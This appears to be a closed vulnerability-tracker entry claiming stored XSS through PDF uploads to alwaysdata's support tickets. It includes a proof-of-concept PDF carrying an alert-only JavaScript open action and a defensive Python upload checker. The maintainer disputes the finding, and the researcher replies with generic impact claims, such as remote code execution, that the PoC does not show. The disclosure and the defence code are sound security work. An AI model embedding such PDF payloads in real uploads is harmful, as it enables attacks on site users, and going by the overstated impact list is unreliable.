- Status Closed
Assigned To
cbay - Private
Opened by milapshah1 - 17.07.2024
Last edited by cbay - 17.07.2024
FS#63 - Stored XSS Via Upload Document
Vulnerability Explanation - When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact - This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
Severity - High
Steps to reproduce:
1) Go to support https://admin.alwaysdata.com/support/
2) Open new ticket
3) Upload this code as a.pdf (
%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>> endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>> endobj
3 0 obj
<</AA
<</O <</JS (
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
) /S /JavaScript>>>> /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> /Type /Page>>
endobj
4 0 obj
<</Length 21>> stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>> startxref
493
%%EOF
)
4) Upload this file
5) Open this ticket
6) Click on the uploaded malicious PDF file, it will reflect
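An added example, not part of this report or of alwaysdata's code: the upload-time checks a defender would apply to a file like the PoC above. It verifies the PDF magic bytes, rejects PDFs that declare JavaScript or additional-actions dictionaries (the /AA and /JS names the PoC relies on), and serves accepted files as a forced download with MIME sniffing disabled. The sample bytes are constructed from the PoC with its delimiters restored; the checked name list and header values are this example's own choices.

```python
import re

# Constructed sample modelled on the PoC above (PDF delimiters restored); not a real upload.
PDF_WITH_JS = (b"%PDF-1.3\n1 0 obj\n<</Pages 2 0 R /Type /Catalog>> endobj\n"
               b"3 0 obj\n<</AA <</O <</JS (app.alert\\(\"xss\"\\)) /S /JavaScript>>>> "
               b"/Type /Page>>\nendobj\n%%EOF")
PDF_PLAIN = b"%PDF-1.4\n1 0 obj\n<</Type /Catalog /Pages 2 0 R>> endobj\n%%EOF"

# Name objects that introduce active content: JavaScript actions, additional-actions
# dictionaries (the /AA the PoC uses), the document open action and launch actions.
ACTIVE_NAMES = (b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch")
# A PDF name token ends at whitespace or a delimiter, so /JSX must not count as /JS.
NAME_END = rb"(?![^\s()<>\[\]{}/%])"


def is_pdf(data: bytes) -> bool:
    """Check the magic bytes rather than trusting the client's extension or MIME type."""
    return data[:5] == b"%PDF-"


def active_content_names(data: bytes) -> list[str]:
    """Return the active-content name tokens found in the raw PDF bytes.

    Names may use #xx escapes (e.g. /J#53), so those are decoded first. Objects inside
    compressed streams are invisible to this raw scan; a full parser is needed for them.
    """
    plain = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)
    return [n.decode() for n in ACTIVE_NAMES if re.search(re.escape(n) + NAME_END, plain)]


def check_upload(data: bytes, declared_name: str) -> dict:
    """Decide whether an uploaded 'PDF' is accepted and how it must be served back."""
    if not is_pdf(data):
        return {"accepted": False, "reason": "not a PDF (magic bytes mismatch)"}
    names = active_content_names(data)
    if names:
        return {"accepted": False, "reason": "active content: " + ", ".join(names)}
    # Sanitised file name plus headers that force a download and block MIME sniffing,
    # so the file is never rendered inside the application's origin.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", declared_name)[:64] or "upload.pdf"
    return {"accepted": True, "headers": {
        "Content-Type": "application/pdf",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }}


if __name__ == "__main__":
    print(check_upload(PDF_WITH_JS, "a.pdf"))
    print(check_upload(PDF_PLAIN, "report.pdf"))
```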
Hello,
As far as I know, malicious PDF files cannot do harm when viewed in a browser. Please upload a video of your PoC.
Kind regards,
Cyril
How can I upload a PoC video? I did not see any attachment.
There's an "Attach a file (max. 256 MiB)" button near the "Add comment" button.
I am able to see only 2 buttons: add link and add comment.
I have attached a PoC video as a Google Drive link – also, in answer to your first comment: this can lead to several types of attacks and escalations, including:
Cross-Site Scripting (XSS) Attacks: If the uploaded file contains JavaScript or other executable code, an attacker can craft malicious scripts that get executed in the context of other users' sessions when they access the uploaded content.
Server-Side Code Execution: Depending on how the application processes uploaded files, an attacker might be able to upload a file that contains server-side code (e.g., PHP, Python scripts). This could lead to remote code execution (RCE), where the attacker gains control over the server or the application's backend systems.
File Inclusion Attacks: If the application allows the inclusion of uploaded files in other parts of the application (e.g., including uploaded files as part of dynamically generated content), an attacker could manipulate this to include files containing malicious code, leading to further exploitation.
Data Injection Attacks: Beyond code execution, uploaded files could also be used to inject malicious data into the application's database or other storage systems, potentially compromising data integrity and confidentiality.
Denial of Service (DoS) Attacks: Large or specially crafted files could consume excessive server resources, leading to a denial of service for legitimate users.
https://drive.google.com/file/d/1NqHZ343Pkvx4HuhikeOLaoocWKRGN2UW/view?ts=6697b4b0
Oh sorry, adding attachments is only available for admins.
You can put your file anywhere you want, for instance on your own alwaysdata account.
Thanks for the quick response, I have attached the PoC in the above Drive link.
Showing a popup is not a vulnerability. As far as I know, you can't steal anything with a malicious PDF.
Hi cbay, stored XSS behaves like this only. Also, for your reference I am sharing a HackerOne report: https://hackerone.com/reports/683792
That HackerOne report is totally different: it's a real XSS, nothing to do with PDF.
I am a security researcher. Unfortunately, I prefer not to discuss this issue further. For your reference, I am attaching the OWASP reference related to this matter. It's unfortunate that I've spent time arguing with you and you still haven't understood the points mentioned in the HackerOne report. Thank you for your response. Have a good day. https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html